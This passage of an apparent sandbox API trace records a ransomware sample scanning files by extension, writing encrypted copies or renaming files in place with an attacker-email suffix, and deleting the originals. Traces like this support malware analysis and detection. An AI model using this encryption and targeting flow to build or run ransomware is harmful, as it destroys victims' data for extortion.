nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.418] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f10058 | out: hHeap=0x5d0000) returned 1 [0052.418] CloseHandle (hObject=0x1a0) returned 1 [0052.418] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0052.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.419] lstrlenW (lpString=".doc") returned 4 [0052.419] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.419] lstrlenW (lpString=".docx") returned 5 [0052.419] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.419] lstrlenW (lpString=".pdf") returned 4 [0052.419] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.419] lstrlenW (lpString=".xls") returned 4 [0052.419] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.419] lstrlenW (lpString=".xlsx") returned 5 [0052.419] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.419] lstrlenW (lpString=".ppt") returned 4 [0052.419] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.419] lstrlenW (lpString=".zip") returned 4 [0052.419] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.419] lstrlenW (lpString=".rar") returned 4 [0052.419] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.419] lstrlenW (lpString=".bz2") returned 4 [0052.419] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.419] lstrlenW (lpString=".7z") returned 3 [0052.419] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.419] lstrlenW (lpString=".dbf") returned 4 [0052.419] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.421] lstrlenW (lpString=".1cd") returned 4 [0052.421] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.421] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.421] lstrlenW (lpString=".jpg") returned 4 [0052.421] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.421] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.421] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.421] lstrlenW (lpString=".doc") returned 4 [0052.421] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.421] lstrlenW (lpString=".docx") returned 5 [0052.421] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.421] lstrlenW (lpString=".pdf") returned 4 [0052.421] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.421] lstrlenW (lpString=".xls") returned 4 [0052.421] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.421] lstrlenW (lpString=".xlsx") returned 5 [0052.421] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.422] lstrlenW (lpString=".ppt") returned 4 [0052.422] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.422] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.422] lstrlenW (lpString=".zip") returned 4 [0052.422] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.422] lstrlenW (lpString=".rar") returned 4 [0052.422] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.422] lstrlenW (lpString=".bz2") returned 4 [0052.422] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.422] lstrlenW (lpString=".7z") returned 3 [0052.422] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.422] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.422] lstrlenW (lpString=".dbf") returned 4 [0052.422] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.422] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.422] lstrlenW (lpString=".1cd") returned 4 [0052.422] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.422] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.422] lstrlenW (lpString=".jpg") returned 4 [0052.422] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.422] lstrcmpiW (lpString1=".xrm-ms", lpString2=".USA") returned 1 [0052.422] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0052.422] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.423] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=715834) returned 1 [0052.423] CloseHandle (hObject=0x1a0) returned 1 [0052.423] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0052.423] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.423] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.423] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.423] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.423] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.423] GetLastError () returned 0x0 [0052.423] ReadFile (in: hFile=0x1a0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0052.438] WriteFile (in: hFile=0x204, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0052.493] ReadFile (in: hFile=0x1a0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.493] WriteFile (in: hFile=0x204, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x104, lpOverlapped=0x0) returned 1 [0052.637] SetEndOfFile (hFile=0x204) returned 1 [0052.637] CloseHandle (hObject=0x204) returned 1 [0052.638] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.638] SetEndOfFile (hFile=0x1a0) returned 1 [0052.644] CloseHandle (hObject=0x1a0) returned 1 [0052.644] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0052.644] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0053.297] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.297] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.297] lstrlenW (lpString=".doc") returned 4 [0053.297] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0053.297] lstrlenW (lpString=".docx") returned 5 [0053.297] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0053.297] lstrlenW (lpString=".pdf") returned 4 [0053.297] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0053.297] lstrlenW (lpString=".xls") returned 4 [0053.297] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0053.297] lstrlenW (lpString=".xlsx") returned 5 [0053.297] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0053.297] lstrlenW (lpString=".ppt") returned 4 [0053.297] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0053.297] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.298] lstrlenW (lpString=".zip") returned 4 [0053.298] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString=".rar") returned 4 [0053.298] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString=".bz2") returned 4 [0053.298] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString=".7z") returned 3 [0053.298] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0053.298] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.298] lstrlenW (lpString=".dbf") returned 4 [0053.298] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.298] lstrlenW (lpString=".1cd") returned 4 [0053.298] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.298] lstrlenW (lpString=".jpg") returned 4 [0053.298] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.298] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.298] lstrlenW (lpString=".doc") returned 4 [0053.298] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString=".docx") returned 5 [0053.298] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0053.298] lstrlenW (lpString=".pdf") returned 4 [0053.298] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString=".xls") returned 4 [0053.298] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0053.298] lstrlenW (lpString=".xlsx") returned 5 [0053.298] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0053.298] lstrlenW (lpString=".ppt") returned 4 [0053.298] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0053.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.299] lstrlenW (lpString=".zip") returned 4 [0053.299] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0053.299] lstrlenW (lpString=".rar") returned 4 [0053.299] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0053.299] lstrlenW (lpString=".bz2") returned 4 [0053.299] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0053.299] lstrlenW (lpString=".7z") returned 3 [0053.299] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0053.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.299] lstrlenW (lpString=".dbf") returned 4 [0053.299] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0053.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.299] lstrlenW (lpString=".1cd") returned 4 [0053.299] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0053.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0053.299] lstrlenW (lpString=".jpg") returned 4 [0053.299] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0053.299] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0053.299] lstrlenW (lpString="VisiorWW.cab") returned 12 [0053.299] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.300] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=195011319) returned 1 [0053.300] CloseHandle (hObject=0x218) returned 1 [0053.300] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab")) returned 0x2020 [0053.300] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.300] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0053.789] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.790] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0053.790] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0053.790] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.796] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0053.798] ReadFile (in: hFile=0x218, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.801] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0053.801] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0053.802] ReadFile (in: hFile=0x218, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.816] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.816] WriteFile (in: hFile=0x218, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0053.940] SetEndOfFile (hFile=0x218) returned 1 [0053.940] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x40070e0 [0053.967] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0053.967] WriteFile (in: hFile=0x218, lpBuffer=0x40070e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x40070e0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.967] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0053.968] WriteFile (in: hFile=0x218, lpBuffer=0x40070e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x40070e0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.969] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0053.969] WriteFile (in: hFile=0x218, lpBuffer=0x40070e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x40070e0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.971] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40070e0 | out: hHeap=0x5d0000) returned 1 [0053.971] CloseHandle (hObject=0x218) returned 1 [0053.971] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0053.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.972] lstrlenW (lpString=".doc") returned 4 [0053.972] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0053.972] lstrlenW (lpString=".docx") returned 5 [0053.972] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0053.972] lstrlenW (lpString=".pdf") returned 4 [0053.972] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0053.972] lstrlenW (lpString=".xls") returned 4 [0053.972] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0053.972] lstrlenW (lpString=".xlsx") returned 5 [0053.972] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0053.972] lstrlenW (lpString=".ppt") returned 4 [0053.972] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0053.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.972] lstrlenW (lpString=".zip") returned 4 [0053.972] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0053.972] lstrlenW (lpString=".rar") returned 4 [0053.972] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0053.972] lstrlenW (lpString=".bz2") returned 4 [0053.972] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0053.972] lstrlenW (lpString=".7z") returned 3 [0053.972] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0053.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.972] lstrlenW (lpString=".dbf") returned 4 [0053.972] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0053.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.972] lstrlenW (lpString=".1cd") returned 4 [0053.972] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0053.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.972] lstrlenW (lpString=".jpg") returned 4 [0053.973] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0053.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.973] lstrlenW (lpString=".doc") returned 4 [0053.973] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0053.973] lstrlenW (lpString=".docx") returned 5 [0053.973] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0053.973] lstrlenW (lpString=".pdf") returned 4 [0053.973] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0053.973] lstrlenW (lpString=".xls") returned 4 [0053.973] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0053.973] lstrlenW (lpString=".xlsx") returned 5 [0053.973] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0053.973] lstrlenW (lpString=".ppt") returned 4 [0053.973] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0053.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.973] lstrlenW (lpString=".zip") returned 4 [0053.973] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0053.973] lstrlenW (lpString=".rar") returned 4 [0053.973] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0053.973] lstrlenW (lpString=".bz2") returned 4 [0053.973] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0053.973] lstrlenW (lpString=".7z") returned 3 [0053.973] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0053.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.973] lstrlenW (lpString=".dbf") returned 4 [0053.973] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0053.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.973] lstrlenW (lpString=".1cd") returned 4 [0053.973] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0053.973] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0053.973] lstrlenW (lpString=".jpg") returned 4 [0053.974] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0053.974] lstrcmpiW (lpString1=".EXE", lpString2=".USA") returned -1 [0053.974] lstrlenW (lpString="DWTRIG20.EXE") returned 12 [0053.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0054.001] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=629664) returned 1 [0054.001] CloseHandle (hObject=0x168) returned 1 [0054.001] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 0x20 [0054.001] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.001] 